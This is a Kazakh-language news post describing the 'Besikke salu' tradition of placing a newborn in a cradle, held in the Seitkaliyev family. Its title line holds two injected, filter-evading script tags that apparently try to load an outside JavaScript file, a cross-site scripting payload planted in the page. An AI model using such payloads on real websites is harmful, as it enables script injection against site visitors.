Мәдениет және ұлттық салт-дәстүр күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

26.03.2024

Мәдениет және ұлттық салт-дәстүр күні

Ұлттық салт-дәстүрді дәріптеу мақсатында "Бесікке салу"  дәстүрі Сейтқалиевтер отбасында ұйымдастырылды. Бесікке салу — нәрестені алғаш бесікке бөлеу рәсімі. Бесікке саларға шақырылған ауыл-үйдің әйелдері шашуын, жол-жоралғысын ала келеді. Баланы алғашқы бөлеу үлгілі ұрпақ өсірген қадірменді әйелге тапсырылады. Ол өзінен басқа тағы бір-екі келіншектің көмегімен бесікті жабдықтайды, сәбидің әжесі не шешесі түбектің тесігінен балаларға тәтті үлестіреді. Осыдан кейін бесікті отпен аластап, баланы бөлейді. Бесікке салған әйелдерге көйлек, жаулық сияқты сый тартылады

Просмотров: 1005


Пікір қосу



Деректерді қолтаңбаға қосу